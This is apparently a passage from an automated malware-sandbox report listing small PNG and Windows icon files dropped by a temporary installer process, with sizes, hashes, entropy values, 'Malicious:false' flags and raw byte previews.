                                                                                                                                                                                                                                                          MD5:F311592151DC7F196CDBC8AF6D426B28
                                                                                                                                                                                                                                                          SHA1:159C11940E4F380F62D56AD12745600EDBEF1E15
                                                                                                                                                                                                                                                          SHA-256:03290429CE68AFD7507C177C9446EFBCC47CFD040DECA70105988D0057919317
                                                                                                                                                                                                                                                          SHA-512:A3259406480C89E73B408DBFDA00B8CBE5F2B168A1C46F6FE73A228B167CDC532FFBB315BD027B130634B8A248F488BD2ADA22CA5A45DF2AD3E728D3FA5DA832
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... ..................................l.(.l...l...m.?.m.`.m.|.k.y.k.].o...............................r.A.q...q...q...q...q...q...q...q...q...o.7.....................u...u...u...u...u...u...u...u...u...u...u...u.o.............y.a.z...z...z...z...z...z...z...z...z...z...z...z...z.^.........~...~...~...~...~...~...~...~...~...~...~...~...~...~.........|..........m.......................3........................|..............x.......9.......'.............................................................................8...................................8.............................................................................'.......9.......x.......................................8.......................m................H...........................................................G..........................................................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):524
                                                                                                                                                                                                                                                          Entropy (8bit):7.51499904676362
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/725PQZeziVpf6wu0rWQ6Rfcho1S01oS77Qtytds:zJQYgB6wnrWQ6ih0WSQtyns
                                                                                                                                                                                                                                                          MD5:6A3D971DD10943973AD7CFF8776678EE
                                                                                                                                                                                                                                                          SHA1:1FC9EA38435DBA93A64B9E48C7A3CCDED3D92333
                                                                                                                                                                                                                                                          SHA-256:EDB59D1E30DEACB83DCCB9CA2D7F83FC52066CAFC7A8E0A633B9B0DD01CDA360
                                                                                                                                                                                                                                                          SHA-512:B5C8C60578504EDD4EDDF7C5A9CC17BA3D04773CA200D5A8189D22C06BAA9081382F6D3FE076771F385AF7DAC51196AC4BFEFF1852A5E16BBF9AE6D1599FFE0E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDATx..OHTQ...w.p.".DP........$Z$.ZD......FB.A`.`.%r.b.....E.T.....I.h!R..B(*2....o.hP3..y....q.w.u....xH.S^..}'.B......q..nY1K\Q....qW.......D.se......67......,...r.8.[......L..-....n...[....3..K.....N.q.q.f.n.$....k`..DGaf....Z3..<0...u..w%.A.^...Y....p.-.U.t...p...s.E).....:.[T.a.&(..'S......B..B.%u...T=....w..{....{..T........t..^...U.u....pbm.l...G....8.8c..EgT............R..G.w..-t...,......a.....]......t...]2.!....=..7...W.......X.......7.#.....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):921
                                                                                                                                                                                                                                                          Entropy (8bit):7.692568178991757
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/7MIPvdQrswMHeAQQI/hnoG82ukRW61fAKmg0sLyVFIMVwIaJ2OnksgHDPkInc:MersR+SIZbnu+FXaYyVBtM2Oksgjlzv4
                                                                                                                                                                                                                                                          MD5:A319CAB2BDD2363F2CE6F71874255367
                                                                                                                                                                                                                                                          SHA1:606F86B9B032C74B9A88240A9A4933B4EA256C52
                                                                                                                                                                                                                                                          SHA-256:0644CF298FE403904496AF78ADDCCDB46C1D3A324BC996A1423F9CC581EBFA39
                                                                                                                                                                                                                                                          SHA-512:D74BB956EF9011436A44617B8DB7519F8335A10F55805BEC4CDB673F971E148614B9A4068146D182BB6024B5774C85CB35A4B10BEC5307F2C367179DEB45E07E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a...`IDATx.].Mh.e..w.....Mf..k...BK..B+I..A.%.*..z(V.*.b.S...E.=..J...DR.R.P#..d..I..Iv...$......uczp..wx....K.o....;...8$*.;Ax...).J..X..;.;...Ru/....<.J.b...`X9x.B.m@I..a-~...Q..p..V...[.....}.h_T.z.........m...6.b......-;..................#pD/........n9.g.....s...F9}..?..</......P..+o.Q.I`f/.^Ma./..\#..N.!..(c....R.S....=.....xX....L.S......}...X._~..8u\....&....p.......w.J..g............1..M...d...x6.......~..yr......[q.......^...@9.efr...:.J....8.O!...X...Y.}.........U."..sbYTm....6.O.5.....[.-.YBK_....W./..x....NVJ..g..e.c..a...../$..&.. sC.t./....].w.na.....4^..S.-..f..Mp....../......;.G.~.+...#..,..<....c.i.*..E,K&..4D{$.fVaL.\n.....l.WO....,.wL..W$...*l.. ..!....c...T.?_e.]...Fd.....h.d..&...m.].4t.u#...^0..y.J....e...Rn..... ...*1....U......Av|}s|...{#....1..T&......V]J.a..<f..|..~.b...?U/...e.g..<wM.5.}.....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):4.304963365030796
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:cKwiwjHRFNgmsPn71386ICxQo0hkNNNNN9:cMwjxFpi386Yo0ib
                                                                                                                                                                                                                                                          MD5:19A1D5E299A9AEEF8E449AE555935968
                                                                                                                                                                                                                                                          SHA1:E7C1EA89DE88FEE6B616ABBE5365C5AA3E42F672
                                                                                                                                                                                                                                                          SHA-256:27CC231887F86DDB6FF938C1FBBC2CE319057BF90382B764AF86ED3F9C47CCB8
                                                                                                                                                                                                                                                          SHA-512:973CCD95A012657F00B195AF3558E5E67B2AD194F9261EC3E8FD9FFC4F423E10A730E4D0ABFC4243F91FAD35097BE09D1DD0D1646CFCF1821F1928E23015CB8E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... ............................................................*...u...................U...................................@'''.....................[[[....U...........................5kkk.............................OOO.........................))).................J4..:)..@@@................................*........qqq.SV..w.,...+.....oN...............................*..............|./...<...@.mL...........................@...j....bbb.0!........N........s0.....aaa%...........U....[[[.........KKK..m...B.....u.....aaa%............zzz......................................_...............U................GGG.....\\\.PPP.............................OOO.........@@@.6C..h...}...>...........................................J4....+.{.....,.............................................HHH.l...-...I...~..D.................................333.........lL.............f.KKK0............................... ggg..........t......T.aaaJ..........
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):604
                                                                                                                                                                                                                                                          Entropy (8bit):7.566535696722621
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/71+R52wdTd01ObCNVVeNROSj6OjPXgEFE7LEgcuq/yp61MVKCXXN:bR5RG1iwVsRPj68vgvEgcN/RKVBXN
                                                                                                                                                                                                                                                          MD5:4AC295DB7E483693981CDE5340D6DD06
                                                                                                                                                                                                                                                          SHA1:2940C14BCC2C1C975D7DC484C43618F8028350A3
                                                                                                                                                                                                                                                          SHA-256:5DF1EB6894459E748C599DEA4119DBD85F8EE024A7932ADC49E80AED7BC3CDE2
                                                                                                                                                                                                                                                          SHA-512:05562C55530620A0860B6E636C45F035ACAFFF4F468B3F29491D909C795102377F778951033B93A8C143D87D7F779E03381E415B914EB1E8198EB0E838243E18
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a...#IDATx.S.k.Q..f7b.j.m).c+.h.F.(.......?@.....x*..^..A/J....TAk......&b]-".....yo...evf.........LP9=...........Z*H.!.....1..r.*.....u......8bi..$b...~..m,..&k..47=.U..A...Z......M...9N..4V.._C.....o.. b.nN"..OE....d.].1A...|.C..}85;...@Bp.t.A..wW.B7......&.Q......D..p..}l...Bm..j..K#E..Y.t.pc.._<G....r_...X.;1..w...f.......b...uK..XF..c|y..{...../a......<...+....F.......r..<..Je..k.y....08v.kk....|>.r.,.............J...}..f...M.|'Z.6.m....;3..B'.Mo........pf3.v.....>....4cL&m.F......&1+.... )....kri.......g...ip;...A.....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):5.106456125169888
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:nEPSZPkAOaXJtA62XWFFFFpkne+FqQ/9tTb:nEiVrJth2mFFFF2B/zTb
                                                                                                                                                                                                                                                          MD5:BBE192389A8CA57807477962B401ACF4
                                                                                                                                                                                                                                                          SHA1:C83E12B14231768D76436CCF919B52D7017801AF
                                                                                                                                                                                                                                                          SHA-256:D546F20D90D384C9A3AF269B16D2C3B06E0500B43668DECA44E7BD50AA525037
                                                                                                                                                                                                                                                          SHA-512:53B9B4EB7E2B1D598AD360B376090AF6A7EC7A4E83D44932E08E8A9D1545BA3BBA9AC7B29B0E2A52F2F02524D79D8A0070FA77D24D2398BD377A975B85B92B74
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... ...............................=...=...=:..=v..<...<...<...<...<...<...<v..=:..=...=.......?...?...>...>...>...>...>...>...>...>...>...>...>...>...?...>...A...@...?...?...?...?...?...?...?...?...?...?...?...?...@...A...B:..A...A...A...A...A...A...A...A...A...A...A...A...A...A...B:..Cu..C...C...B...A...A...A...A...A...A...C...A...A...C...C...Cu..E...E...D...S.......................L...g...s...D...E...E...G...G...D..........................................E...G...G...H...H...G.........................................G...H...H...J...J...I.........................................I...J...J...L...L...K.........................................K...L...L...N...N...L...}..................v...L...p...{...M...N...N...Ou..O...O...N...N...N...N...N...M...N...O...N...N...O...O...Ou..Q:..Q...Q...Q...Q...Q...Q...Q...Q...Q...Q...Q...Q...Q...Q...Q:..Q...S...S...S...S...S...S...S...S...S...S...S...S...S...S...Q...T...T...T...U...U...U...U...U...U...U...
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):4.995757173580584
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:kV8FtQm5AZDsVYmrJcEa7RjyWtYmmatOjk:k6FtQXwY2CEalWyYbatOjk
                                                                                                                                                                                                                                                          MD5:D7F9CD5B7E1275B24EB50769BBBE3021
                                                                                                                                                                                                                                                          SHA1:0B213D27ABDB5016B1805C2FCE5238196F48718C
                                                                                                                                                                                                                                                          SHA-256:414BDEC0A45A95F08390272EDFFF615879E3D0116FFA38AE341770327C8A69ED
                                                                                                                                                                                                                                                          SHA-512:8688C65B158C7F26424C9AF3E59382D7C59155D14377965B14277BE36D49012610D7ADC719E0CC6FFC3946B9D08174FC048E121FDB13104B7BD68365F15130DC
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... ....................................................................................................................................................................................................................................................................................................................................................................................................................................................41..2/..................................................||...#...'...'... ..tr......................................ig.."(...+...+...*...)...$..XW..............................RO..**..%...#-.. ,...,...+...+...%..87......................C@..63..01..-0..*0..&...#-..$-...,.. -...&..#"..............=:..<8..96..74..52..22...1...1..)/..&...#-.."-...(...!..~{..C@..;8..?;..>:..?;..96..:6..74..42..01..21..-0..)/..%..."+...!..=:.=:..=:..<9..;8..85..64..41..3/../,..,)..)&..&%.."$...#..."............................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):5.949963945175186
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:PE14x6qLv19cI/PRw1ZoPh+tV/HFm+TIe0WmY:s1ALtDtPh+tVvz0WB
                                                                                                                                                                                                                                                          MD5:E929E2F2B14B9EC2EC42A663F3C7EEC2
                                                                                                                                                                                                                                                          SHA1:2E66730E02EEDA9641153D48F408CECFB72E92F6
                                                                                                                                                                                                                                                          SHA-256:A6DB330F99F450E9BBA286E6FE96B13DD8DA5079A7A1F8E191A09123C6A61906
                                                                                                                                                                                                                                                          SHA-512:5AFBE7ABB77DA9F37D5E0392BE622C8AC8BA0C07F02430E5F5FEC624074F12ABA39BEFF2AA4D44CD3029886A8B71BE7AEAE9F6AED8A95D83369984EC39CF066C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... ........................................................E@...K...$..].......................................#.../...C...N0...]!..^...J..............................A&......P...U17>.FOX.Q\g.Vbm.z:..j)..J...].."............A..4^...C;@.OWa.Ual.ox...............^\.y5..g*..x-..."......L...`...]%..................................j#..}7...G...5.T....8..Ic........................................<...K...O#..E.......A..h'..............w...v................I...u4..]$...F..Y!......v&.h&.............................V`j..C....@..m0...J..|(......{)..E!..zq.ehm..........................C...n...<..S..z'.......7.g:.i7".....TUY..................rY..O..._ ..~3.....y(......K..|7.{C#.._;..~E.^E0.{oj...~.lRP.e3...x3..v..q...;..v'......R...1..d9..yM.(:...v*..<..v'..b....^...o$...>..y...+..i.#..........8q.}0..r.......N..h...^%...<..S.....?...1..p...................p"......{..w..W..L..N..A...5...*..u$..........................].:..-..J..;......|(..y&..u
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):712
                                                                                                                                                                                                                                                          Entropy (8bit):7.689986023244019
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/7hFFKT/SNQRb8l3lGQdnJ5l9hfP5Y3OLHLeTS8T38YuFc5Hdp8rMPLQX:2rW/SNQRgl38UnJ5Vfy3OjLZ8T38YuFz
                                                                                                                                                                                                                                                          MD5:BA4DA486665B6C79F792A39BF6F03ACF
                                                                                                                                                                                                                                                          SHA1:3746A3488D981870D9CDC6FE16DD6C8171DE6E0F
                                                                                                                                                                                                                                                          SHA-256:5444F65B5694092DD587F8C3E8BB44E159556E45688C856BD5F9515FAD6FF2B8
                                                                                                                                                                                                                                                          SHA-512:9C3D87AEB7C2E5CF5FC08DBF666E9DBBBE431EF71BB83D5C769C9F88DDFB41934C404D72985E320B6BAF0C9F1FF45E057B82C76EBA54BFA01BF2456533F3C0D5
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDATx.S]HSa.~..;.gS..,KDSG6I....$..D....*......B.X....].".EH.Be%.$^x.*.....!.b.%..s..Y..%..q...>..>...4. .....&s.~W...X}./..YO....R............h.....Ju....$....e...ij.O...\..%..w..pp-..8I.x...5.]..u.$vo.J.(....b..h..TC.K...>1D.p(.po..5.i...}..:.eP..a..edGs.C.v.y2t..)...OGMA..$..J.v....)|...$.7Ed~.E.[.J..1...n..'.......BaD..[.) ....(~.1PA...U^<@.y.=,5c\'(rYP[.@yN*.0...\.)FV..Q......3.hK.Rb?.j.....j^....q"?.......-....'...)..'.QD...7..U.....^...w.g.........>.......o*?e..o.>Bl.A.]+d....C..f4..C......7...?..V...RZ.;/D.V..(...G5"...G.wO.L.D..K-.m-. !......`M...p...evT.L..].....:.P.{...@L..R..r[..?.1.`...+N=...i@S"j2......2!.c....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):5.954587575587282
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:mcyV2d56miiGbKZFG8cZWvl24pZYEYmFMQ05lOo4TTTTTTTTTT3:mcJDbGua8cZOlBUEYA906o4TTTTTTTTX
                                                                                                                                                                                                                                                          MD5:A6AF58DFDF7BCB6AE474DC731AEB0819
                                                                                                                                                                                                                                                          SHA1:353D993129D8C0060BDAFF6B32DACCD1D91F37DE
                                                                                                                                                                                                                                                          SHA-256:62B935FEE25DC4480962834A3AC9B21E285C75FA25EB8BF5288BE4EAEEA8F118
                                                                                                                                                                                                                                                          SHA-512:21259178D3D551E232C63B89DA9F2613F0CB0FF6D4D33A150DDAF6DED6795E277845359ADF228BE2741639838F78DFA56554E0D26A77091BC09361ED18611330
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... ....................................................................~e.....r=/..G8.............................................t@3..........bL..fOb.............lZx.ta..s`..t`..o\..kY..lY..lX..mX.\L>.eP..pX..iRX.........r`D.m..o..m..|g..yg..yg..zf..zd..u_..oZ..v_..rZ..jTZ.........}j\.r...j...m..v..q`..o]..o\..q]..p..v`..pY..t]..lV[..........p[.q....................................rZ..q\[.........s[.u..........................................r[..r][.........x[.w..............se..........q`..............q[..r^[.........}[.x.......................................mX..wc[..........[.~........................................t^..yd[..........[........................................k..}g..ua[..........[.............................i..~i..uaZ..........Z................v..r..u..o..m..n..~i..vcY..........$......................y..w..s..n..k.zg$.............&..Z..W..X..X..X.~X.zX.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1342
                                                                                                                                                                                                                                                          Entropy (8bit):4.6359350276939795
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:dji7RcfMBrFZ4SJP/eM3Oa6xkbHITYphkt:djUcfsr1xG9Ypmt
                                                                                                                                                                                                                                                          MD5:DA65CA13005C823DFDB8A02C0F534EA1
                                                                                                                                                                                                                                                          SHA1:555B00EAB24107ED4B1E86A30E634DED6A3B172C
                                                                                                                                                                                                                                                          SHA-256:73A10CE1010DDF27AD68552766FD5803E9DDAFB7ACE123822E6EB2FD69954D9A
                                                                                                                                                                                                                                                          SHA-512:576FC82838F477AB1806433240C1508184C1E00B5365A2F5719A3FA53DEFD4AE71A6ED5A262F5D174AAF089F46F677332D270C154AC6185E8616DF1D0E53BC17
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .(.......(....... ..... ........................................E...D...........................?.............................................d...~...............................\....M...d.>...m.G...C...C...C...C...F.....{...........................o.C...C...C...C...C...B...B...B...B...o.N................<........C...C...C...B...F.....e.......b.@.B.....|........?........G...C...C...B...j.J.....................B...F.................C...C...B...n.P.........k.K..........n.B...C.................C...B...T.-.........F...B...C...C...B...C...C.................C...B..........`.=.B...C...C...C...C...C...C................C...A..............B...C...C...C...C...C...C.................H...B.............h.B...C...C...C...C...C...F..............1.......B...i.H....E...C...C...C...C...C...C.....|........>...........x.Z.B...B...C...C...C...C...C...C...v.V................................J...C...C...C...C...H...........................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):563
                                                                                                                                                                                                                                                          Entropy (8bit):7.517174524579319
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/7w//AIiO/vrFWdRdGBvXRwnHbMwigmsA7F9fS6ofSZHRQX+K:FB/vrEDdGh0ig8zKzSFk+K
                                                                                                                                                                                                                                                          MD5:DB972EE37A5D0AEF2AEA2FE741B82C1D
                                                                                                                                                                                                                                                          SHA1:C286B9CFEDA3CB6D3E19E1D7747790C52D84D377
                                                                                                                                                                                                                                                          SHA-256:6A09E141A38F22AF46750BA3186AB260B0C566DDCA209B083623D8305BDF14A2
                                                                                                                                                                                                                                                          SHA-512:9F35E67F88A4A250F8F983C8273DFD76F07A8CEEFBF54BA97D73FD1AB4C62508D8999AACD204E73CD04B86A0556AF895CA4BC07A722FB3D6143B7B07FF20BFF6
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDATx...O.A...v...aU<..b.@.F8y!..;.J ..{.w)^ML..../-..0!....GBS.=...v.......v...If.....;.......}.9...k......Q[...YV.........y|.I\....QUb.....^ HN.....F.y...0r#.d...+.>.`.".....|....:b..sB.xq..~..]$(U.G....M.;?]|.....0..I.$|..7.xz.@....R-......../.....,7C.%.<.".....0N.|. ........[UU]....0....=.f.2........G...C..p.. ....h...(...r...dR.I.]..h{.d...z~......s_.(U|..(<J ._.<.+.#,.su3.^.Q&.....ir.j.V....E}...C>.o.m...A..;......E..C./..J...!..I.*....8ij...W._.@;..[.....O.......-V.xD8.....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):488
                                                                                                                                                                                                                                                          Entropy (8bit):7.3920224953533245
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/7drHlKbwPKM5RMujiE9hN+clw+798b7w6sJ:orHkbwSwMujiE1+V+JukJ
                                                                                                                                                                                                                                                          MD5:694A53E27D606EC219A2701C6DD6926C
                                                                                                                                                                                                                                                          SHA1:E2EF3DA049160DB18AC5AC2D770B3F05F219722A
                                                                                                                                                                                                                                                          SHA-256:0AD6EB5F37D593E9096640D5C0440D108BE85DCBB0C726CB5E0C8802E1B3421B
                                                                                                                                                                                                                                                          SHA-512:B246D42344E90922EFCCFAB836BADC30DBA8E370BEE29E03524B0310FCDC9FEB727BEF32EDB695DD42B72FC99543520B91D8179A83ECC479C709DB9077861216
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDATx..K.a....[J..............D.4...I...Q8.iT.......D$-EC.%G.IP....R+.....4.{....s<......-....!.#H=..p........r*....!...z=l6....o.8..$.T*}...........N'...\....e.3...C8.n..3..R..-y.....j0cX.x.o...4...#!>!u...X..".....V+.!..<#{E.R.aj....J...,,....O.N..8O.C"... ..6R.l6.7B.....9..%.{*.b.L..C.ET..v.=....P..x'.....V.*s.V...A<w...9...\....T..E...|...d;`....,G..O..#i..PD6.....5....n....4..<2.4......`.../S..u.>..;._........IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):838
                                                                                                                                                                                                                                                          Entropy (8bit):7.7197016545374275
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/7Mx+Nre92kjEfcc8YhUaUuYE67bCIUMn+VnMUHAqOIjaDD/yJgQGToLYZFN:Z+LqERhUO67bCIZfmAajkj3tyYjN
                                                                                                                                                                                                                                                          MD5:D9F77B09484FECF86DAB1E27B61481C3
                                                                                                                                                                                                                                                          SHA1:D514C22AC2A1AC4B0826E38C48BABD9CBB077F9F
                                                                                                                                                                                                                                                          SHA-256:CBFBDC4F27D2DE65E5F38B4233C967F1781449DE939BDF7451F2548511CF8F95
                                                                                                                                                                                                                                                          SHA-512:606E0E9800296568C06F6015BB6DF091D5B75E516056032FB28CA1508E67AA0E8BBAC978981CA9FF492F54A7CFE02DF233042442F707588E6E8CFD82C7F8B93C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDATx..kHSa......t.4..kj...I0)l.y...ZF.Fe.D.%K.K.....FVH..A.Y..Z..E. .".L..sz.,.|.}.....wx...O....>... |.x(x.;!..;S..n..' ...o;.y.TJ!.E)"!.xbh...^..V......,....vG....%.E...7......o]v.l.a..1<_jN24L.hL..,..5q..a.q.V..C.p...=fcup..B.........X^..t.*.....Z.lSX.le@.J..\..kh.B...a.].}(eJl....=e.~..,:C....Sw1..//...W. cd(.[...g0<>....hT.8n.C.<D.i..}`.1...=E.9s~.)u-2............c.m..G.pN..(...:.!a$Y?.W...rN,.A.9...u.X.0292.....Q'.7..T".M...|..*.#....".2z'.i.i...,X....+TT7..S..k+..D'...R..q....p....n.`..\..btr..T......D.M...Op.vr,H.T..-.../Fm..T..{....*XG.X...o..qOt`GD..}~....0..Ytm.S{.5.Hvs.mE..yn...=.uC.N....;..O:.....i..R......R.Ix......../..o...x>........7jZ..61.1....6..#..<H. .x...."..H..r...iY.S".Ob.......:cf..L,.9NI...Hgu.........4..`......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):5.20340524330819
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:F5e2nwbQh05puMPaz5NV9/COvwqsvuKMBwnwfqHtJZcaHqtMbHgGomu/HAmlMscR:aCupu0az5l5R4t7bHqkAN/H7WrefjU8W
                                                                                                                                                                                                                                                          MD5:6974D5655CF050D09AEDEFB0A870B09C
                                                                                                                                                                                                                                                          SHA1:2C87D6EFB277163490FFF31C594A5127E8D0B509
                                                                                                                                                                                                                                                          SHA-256:A5761AE112ECB0B8CA16EDD77F9B112D983D7F8B0C229A8099E1A35B2E4F6993
                                                                                                                                                                                                                                                          SHA-512:AA3DBE81C2BFDBDBF4EF81DE63685BEC3743762254476F278E1FC6956A39910E2C4A1E83E491AB579B107FC0496E134AB946800D7D2CA367AE4AF2E109B6741C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... .............................C.<&D.=SC.?AU.U.....J.@.E.>FC.=XE.=?U.U.........................I.B#B.;.B.;.B.<.C.;.C.;.B.;.B.;.B.;.C.;.C.;.U.U.....................F.>>B.;.B.;.].W................k.f.B.;.C.<.H.A'................F.>BB.;.................~....l.g.t.o.S.M.C.<.U.U.........f.f.C.<..}........a.\.........}............L.E.C.;.........D.;VB.;........n.i.............................C.;.U.U.....B.<.].W....._.Y.....~.z.B.;.B.;.J.D...............B.;.E.=?....C.<.j.e.....E.>.....P.I.B.;.B.;.B.;.......x.s.....B.;.C.=X....C.<.g.b.....O.H.....u.p.B.;.B.;.D.=...............B.;.E.>J....D.<|D.>..................|.w..................B.;.I.@.....E.>%C.;........T.N...............}.x........e._.B.;.............B.<{G.A.........z.u.D.>.B.;.X.R...........C.;.G.@$............U.U.B.<.G.@..........................}.C.;.B.=d....................U.U.B.<{C.;.F.?.l.f.t.o.c.].B.;.B.;.E.=;................................G.@$D.<|C.<.C.<.C.;.D.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
